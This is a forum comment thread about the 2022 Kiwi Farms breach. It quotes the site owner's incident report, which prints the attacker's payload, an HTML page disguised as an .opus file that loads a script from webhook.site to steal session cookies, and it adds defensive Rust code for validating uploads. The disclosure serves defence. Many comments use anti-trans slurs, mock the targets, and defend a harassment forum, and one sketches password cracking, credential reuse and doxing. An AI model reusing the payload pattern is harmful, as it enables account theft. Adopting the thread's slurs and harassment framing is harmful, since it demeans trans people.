all 38 comments

[–][deleted] 27 insightful - 4 fun27 insightful - 3 fun28 insightful - 4 fun -  (20 children)

😨😨😨😨😨

Those troons are going way too far....

[–]Datachost 22 insightful - 2 fun22 insightful - 1 fun23 insightful - 2 fun -  (5 children)

It's insane, all because they refused to back down on archiving what Keffals did. There's no actual proof they were the ones who doxed Keffals, the information for that seems to have come from a different site. The weird Unionist threat against him came from a weird Unionist, not KF, apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Are the regular users of KF slightly obsessive arseholes? Sure, there's no law against being a slightly obsessive arsehole though.

[–]ClassroomPast6178Problematising the things you love. 13 insightful - 2 fun13 insightful - 1 fun14 insightful - 2 fun -  (3 children)

> apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Seems like a weirdly suicidal thing to do in NI, second only in the “I want to die painfully” stakes to cutting down the tricolour.

[–]Datachost 10 insightful - 1 fun10 insightful - 0 fun11 insightful - 1 fun -  (2 children)

Yeah, considering Keffals is staying with a local I'd like to believe even they aren't dumb enough to do that. Which shows you how weird the bloke is who sent the death threat, that he actually thought that was a believable rumour

[–]ClassroomPast6178Problematising the things you love. 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

There are people that are basically clockwork. You wind them up and watch them do something ridiculously stupid. I had a friend like that at school, he was a nightmare to deal with because other people knew that they could provoke him into extreme violence with the most ridiculously made up stories, needless to say he’s been in court a few times now.

[–]OuroborosTheory 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

[–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

Agree. For others to see: archived thread of Keffals on KF: https://archive.ph/lWQ0v

Back when I was lurking there I didn’t go to Keffals’ thread so I didn’t know who it is, beside just knowing it’s some “big lolcow”. The section in the 1st post titled “Child grooming” (next one “The Catboy Ranch”) is especially interesting, as of course Wikipedia will never tell you about these accusations. https://en.wikipedia.org/wiki/Keffals

[–]FlyingKangaroo 14 insightful - 3 fun14 insightful - 2 fun15 insightful - 3 fun -  (7 children)

This is awful... KF is already “hidden” to everyone who doesn’t know how to access it or isn’t interested in looking for it/who didn’t have an account there, why do this?

[–]brimshaeBased Woodchipper Merchant 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

Because we're not allowed to call out child predators anymore.

[–][deleted] 11 insightful - 2 fun11 insightful - 1 fun12 insightful - 2 fun -  (1 child)

I also would like to know that.... Also, how did those troons even managed to attack the TOR Network?

[–]FlyingKangaroo 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

After all I assume some of them know how to access TOR sites (sometimes certainly for a dark purposes... heh), so? The answer is always someone’s tech skills. Too bad they’re wasted by such degenerates.

[–]ExplodingToasterOven 7 insightful - 2 fun7 insightful - 1 fun8 insightful - 2 fun -  (2 children)

Once you guys have been marked as an "extremist group" "wanna be domestic terrorists" or best of all a "hybrid gang" as in the juggahos, then you're fair game. People will give no more shits about that website or its members being targeted than they care about someone strangling a prostitute in the 80s, throwing a journalist out a 20th story window in Russia, or raping and torturing your Paki maid in Saudi Arabia.

Shit, in this country you might as well be marked as an extremist juggalo jihadi adrenochrome sucking pedo-vore anarchist necro-zoophile. The government has essentially painted a target on your asses for every would be vigilante, both IRL and online, to fuck with.

At this point you could just about team up with ISIS, Antifa, the Temple of Set, the Proud Boys, and David Fucking Duke, and you wouldn't be any less despised. :D

And while this sounds like an exaggeration, uh, no, its not. You guys are well and truly fucked. Best bet is, find somewhere else to hang out. Get a new hobby for 6-9 months that does not involve stalking troons, strangling rent boys, humping dead animals, tormenting furries, or whatever else you people are into over there.

Remember, America at large has the attention span of a squirrel on mescaline. Keep your heads down, your mouths shut, glue your fucking fingers together, get out of your mom's basement, and pretend like you're real people for at least a few months. Get some fucking sunlight, hang out at bars, maybe meet some drunken slut to have an ill advised fling with, and have something like a real life.

And THEN you can go back into the basement come winter, and fuck around as usual. lol!

[–]Datachost 12 insightful - 2 fun12 insightful - 1 fun13 insightful - 2 fun -  (1 child)

> At this point you could just about team up with ISIS

Unlikely. Even ISIS get to have a twitter account.

[–]ExplodingToasterOven 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (0 children)

Sure, because it's easier to track them when they're using at least one known media outlet. Same thing happened with Sinn Fein, the IRA got their media guy to spout off for them, and as part of coordinating their media presence, this tended to slow them down from any spontaneous action that might be "off message".

[–]Dzonatan 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

Keffals caused a Streisand Effect with his every move and is too arrogant to change his approach.

A subset of spectators have a "oh really?" approach and don't take things at face value. What do I mean by this? Here's some examples:

Keffals proclaims that KF is a den of nazis. Someone goes "oh really? I want to check it out and see for myself".

Keffals proclaims that KF is down. Someone goes "oh really? I'll go check it out and see if it's really down".

Keffals proclaims that KF is using TOR. Someone goes "oh really? What's TOR in the first place? I'll go check it out".

Shame doesn't work on curious people and the longer it goes the more people start paying attention. There's only one thing Null needs to do. Keep being stubborn and bring site back up over and over and over again. Eventually Keffals will lose his paitiance and do something so drastic that not even troon status will protect him from jail time.

In his latest update Null had to go for a week. Before that there were some murmurs about his family problems and some mention about his family being threatened. That sounds to me like Keffals is on the verge of madness and is just logistics away from grabbing a knife and going to his country.

[–]ExplodingToasterOven 9 insightful - 2 fun9 insightful - 1 fun10 insightful - 2 fun -  (2 children)

lol! This looks more like a contract hit. And probably not a real expensive one as the forum hacker was doing some script kiddie shit.

[–][deleted] 6 insightful - 4 fun6 insightful - 3 fun7 insightful - 4 fun -  (1 child)

Lmao So these troons wasted money on some amateur hacker? Good, served those fags right. Now they have much less money for their estrogen shots, lol🤡🤡🤡

[–]deusex 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (1 child)

This is cyberterrorism. Simple as.

[–]handbananasrevenge 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (0 children)

Cyberterrorism cheered on by social terrorists.

[–]FlyingKangaroo 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

On such topics it’s also good to know that they also attacked lolcow.farm in the past, posting very disgusting illegal materials there... Discussion about the topic here: https://lolcow.farm/meta/res/44601.html#q44601

[–][deleted] 20 insightful - 1 fun20 insightful - 0 fun21 insightful - 1 fun -  (6 children)

That explains why I couldn't get on today I guess. I hope they don't come for saidit next. Whenever a space exists for people who aren't SJWs now it seems like it either gets compromised or destroyed. I just want to talk to like minded people instead of militant leftists. I'd be fine with them staying on sites for that if there were sites for other people to maybe vent or joke or talk about it, especially because I live in Canada and it is hard to find people my age who are not obsessed with bringing up race or gender or something about how weapons are bad but complain when women need to be cautious on their own because they might get assaulted, we can't have even pepper spray and men can get assaulted too but apparently having any self defense that isn't your own body is the only way.

I can't talk about this stuff in real life. Plus the transgender ideology has really gotten big here. It targets a lot of mentally ill young women here, I almost believed it when I was like 14 because I was really insecure and lonely cause I didn't like makeup (Only cause I felt like it was like lying and I wanted to be pretty without it) so I got caught up in their forums and since I had no free time or anyone to say "Hey, that stuff is not right, you are a teenager and just figuring stuff out" I read the subreddits and almost ended up socially coming out and asking my therapist about being transgender, but thankfully she brushed it off and so did my parents and I got over it a year or two later, thank god. I realized it was all a bunch of nonsense when I met my older cousin one day. She was going by male pronouns but she wasn't on any hormones, she was autistic and she kept saying things like dissociating like me, a 14 year old girl knew what it even meant, she was nice and stuff but she seemed really unwell. It freaked me out honestly, I realized I didn't want to end up like she did, I know that is really rude but she was really off.

I cannot say any of that to anyone in real life, I need somewhere online or something, just so I can blow off some steam from this sjw stuff in my own life, it is everywhere and people have places if they are sjws but they can't stand when we want to just have something to ourselves.

Sorry for ranting, I know it isn't a big deal but I don't know anyone my age in real life who isn't super left wing now. I know I sound dramatic and it isn't the end of the world (not literally I guess) but I just want to go on a forum or website without the preachy tones. I'm just a bit disappointed because the internet is getting super boring without dissent. Oh well. I found Kiwifarms to be refreshing compared to most sites now, I am surprised these people can't let go of their obsession with taking it down.

[–]filbs111 14 insightful - 1 fun14 insightful - 0 fun15 insightful - 1 fun -  (2 children)

Being a young woman with a brain in Canada must be a pain in the arse. It worked out for Lindsay Shepherd though. Stay the course!

[–][deleted] 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

Thank you! I have one good friend in my area but it can get lonely otherwise!

[–]FlyingKangaroo 5 insightful - 1 fun5 insightful - 0 fun6 insightful - 1 fun -  (0 children)

Thank God I don’t live in Canada.

[–]ExplodingToasterOven 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (2 children)

Saidit is not even a blip on the radar. They might as well look for you clowns at an AA/NA meeting for all that was worth. :D

GAB is probably the most likely target, and they've already hit those guys at least twice, forgot about them, and moved on.

Quora, that still has quite a few people ranting and raving, but the demographic there is like 45+ at a minimum. It's more a place for senior citizens to shake their fists at the young SJW punks, starbucks trashing antifa rejects, and useless politicians in general.

Again, best bet is for most of the KF rejects to find another hobby, if only for 2-3 months, by which time the attention span of the usual wanna be hacktivists will be onto something else. Like video hackers doing deepfakes of disney princesses to make them white. :D

[–][deleted] 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (1 child)

Eh, I don't think I'm a clown for being concerned about this stuff. An idiot maybe but everyone is different I guess.

[–]VulptexMy pronouns are the/matrix 12 insightful - 1 fun12 insightful - 0 fun13 insightful - 1 fun -  (3 children)

How would they get their passwords? I would hope it's not stored in plain text.

[–]IMissPorn 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

They probably didn't. This announcement is just saying that given the severity of the breach, you should assume it has been compromised and respond accordingly.

[–]ClassroomPast6178Problematising the things you love. 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (1 child)

About ten or fifteen years ago it would be with rainbow tables, but these days you can run hash crackers on GPUs. A couple of breaches over the years allowed the collection of millions of hashed passwords which have now been cracked, so combine the hash cracker software with the database of cracked hashes and, whilst it still isn’t trivial, it’s not rocket science either to reveal passwords. Passwords need to go the way of the dodo, we need a better security solution.

Have I been pwned is a very useful resource.

This article is a little out of date, but it explains everything really well.

[–]ExplodingToasterOven 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 1 fun -  (0 children)

This is a bit more up to date. https://darknetdiaries.com/episode/

https://www.youtube.com/c/BlackHatOfficialYT/videos

The main reason people play the long game is.. Most people have no idea WTF to do if their phone gets stolen. Things like rolling your passwords over in less than 4-8 hours, freezing your credit on any cards linked to your phone apps, and making sure your fucking 2FA is not linked to a number on a phone number, ANY phone number, no matter how well controlled.

So they'll sift for hashes, crack passwords, and try them on other sites that seem to match a given person. So if you have the same bitmap or jpg avatar on 20 forums, they'll fucking run that password on ALL of them. Because while people may use opsec on Kiwifarm which is likely a target for direct retaliation, they probably give no shits about their regular accounts other places.

First place they'll hit, probably gonna be your google account, facebook, linkedin. They'll do the usual doxing shit of seeing if anyone is mentioning a KFers IRL name on various facebook groups from say, your high school, college, whatever. And from there, onto the gaming accounts, discord, mumble. If they can dig through your chat logs, find all the crazy shit you were into, and make an anon dump of this to your employer, college admins office, parole officer (probably quite a few of your KFers will have one of these soon, if not already).

They're going to do to you guys, what you're already infamous for. But with the intensity of a Perverted Justice crew who've been fed near lethal doses of Nazi Crank and Cheetos, given a list of passwords for known "particular" youth obsessed members of the clergy in a region, military grade VPNs, source spoofing and hacking tools, and legal immunity. So essentially, something like the entire North Korean hacking crew is after your asses. :D

With the Jan 6th whistleblowers, snitches, they were mainly just trying to get rid of asshole parents, uncles, people nuts enough to do a mag dump into a squirrel who ran across the fence line and set off a motion light. Crazy fuckers in essence.

But, with the swatting, and other illegal stalker shit KF is infamous for, you guys have BECOME the crazy assed drunk Jan 6th uncles who need to be put away..

[–]ClassroomPast6178Problematising the things you love. 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

I guess this is why they had so many warnings about Opsec when you signed up to KF, this scenario being the worst case.

[–]jet199 5 insightful - 4 fun5 insightful - 3 fun6 insightful - 4 fun -  (2 children)

Your passwords were likely protected because our system can't cope with small data export requests.

[–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

It's not a bug, it's a security feature!

[–]notafed 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

I use different passwords for every site. I'm not worried about that.

[–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

From kiwifarms.net:

Site Breach

User Impact Statement

The forum was hacked. You should assume the following.

  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.

Thankfully, most users pay attention to my privacy checkups and there isn't much to leak. You should take a moment to read privacytools.io, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyTools. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence.

Prognosis

The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurriedly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult to stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation

Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last activity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"

It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.

The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url> </script>

I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.

The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

You can find relevant scripts below.

https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh
jcmoon@pm.me

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.
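A server-side check for the failure described in the Technical Explanation above (an HTML page stored under an .opus name because uploads were not validated), as an added example that is not part of the quoted statement and is not code from XenForo or the ruforo repository. The type and function names are hypothetical, the sample bytes are constructed, and the response headers assume the application itself serves stored media.

```rust
// Added example; not code from XenForo or the ruforo repository.
// Verdict, check_opus_upload, media_headers and the samples are hypothetical names.

#[derive(Debug, PartialEq)]
pub enum Verdict { Valid, NotOgg, NotOpus, Truncated }

/// Structural check of the first Ogg page (RFC 3533) and the Opus
/// identification header it must carry (RFC 7845). The page CRC is not verified.
pub fn check_opus_upload(data: &[u8]) -> Verdict {
    const PAGE_HDR: usize = 27; // fixed part of an Ogg page header
    const OPUS_HEAD_MIN: usize = 19; // smallest legal OpusHead packet
    if !data.starts_with(b"OggS") {
        return Verdict::NotOgg; // HTML, scripts and other non-Ogg data end up here
    }
    if data.len() < PAGE_HDR {
        return Verdict::Truncated;
    }
    let (version, flags, nsegs) = (data[4], data[5], data[26] as usize);
    if version != 0 || flags & 0x02 == 0 {
        return Verdict::NotOgg; // the first page must be a beginning-of-stream page
    }
    if data.len() < PAGE_HDR + nsegs {
        return Verdict::Truncated;
    }
    // The segment table gives the payload length of this page.
    let body_len: usize = data[PAGE_HDR..PAGE_HDR + nsegs].iter().map(|&b| b as usize).sum();
    let body_start = PAGE_HDR + nsegs;
    if data.len() < body_start + body_len {
        return Verdict::Truncated;
    }
    let body = &data[body_start..body_start + body_len];
    if body_len < OPUS_HEAD_MIN || !body.starts_with(b"OpusHead") {
        return Verdict::NotOpus;
    }
    Verdict::Valid
}

/// Headers for serving a stored upload so a browser never renders it as a page.
/// Returns None for anything that did not pass validation.
pub fn media_headers(verdict: &Verdict) -> Option<Vec<(&'static str, &'static str)>> {
    if *verdict != Verdict::Valid {
        return None;
    }
    Some(vec![
        ("Content-Type", "audio/ogg"), // decided by validation, never by the client
        ("X-Content-Type-Options", "nosniff"),
        ("Content-Security-Policy", "sandbox; default-src 'none'"),
    ])
}

/// Constructed sample: minimal first page of an Ogg Opus stream (CRC left zero).
pub fn sample_opus() -> Vec<u8> {
    let mut p = b"OggS".to_vec();
    p.extend_from_slice(&[0, 0x02]); // version 0, beginning-of-stream flag
    p.extend_from_slice(&[0u8; 8]); // granule position
    p.extend_from_slice(&[1, 0, 0, 0]); // stream serial number
    p.extend_from_slice(&[0u8; 8]); // page sequence number + CRC
    p.extend_from_slice(&[1, 19]); // one segment of 19 bytes
    p.extend_from_slice(b"OpusHead");
    // version 1, stereo, pre-skip 312, 48 kHz, gain 0, mapping family 0
    p.extend_from_slice(&[1, 2, 0x38, 0x01, 0x80, 0xBB, 0, 0, 0, 0, 0]);
    p
}

/// Constructed sample: an HTML document saved with an .opus name.
pub const FAKE_OPUS: &[u8] = b"<!DOCTYPE html>\n<script src=//example.invalid/x></script>\n";

fn main() {
    for (name, data) in [("real.opus", sample_opus()), ("fake.opus", FAKE_OPUS.to_vec())] {
        let v = check_opus_upload(&data);
        println!("{}: {:?} -> {:?}", name, v, media_headers(&v));
    }
}
```

The check decides from the file's bytes rather than its extension, and the `sandbox` policy only takes effect if the response is ever loaded as a document, so normal audio playback is unaffected.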

[–]sproketboy 2 insightful - 3 fun2 insightful - 2 fun3 insightful - 3 fun -  (1 child)

r/lolphp

[–]omegamissingnopneumonoultramicroscopicsilicovolcanoconiosisexualgender 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

wrong site

[–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

Some current KF discussion from Lolcow.farm: https://lolcow.farm/snow/res/1649200.html#q1649200

Osaki, the trans wolf, is sending a fake document (containing false allegations of CSAM in the farms) to every domains

Now that’s something I didn’t know.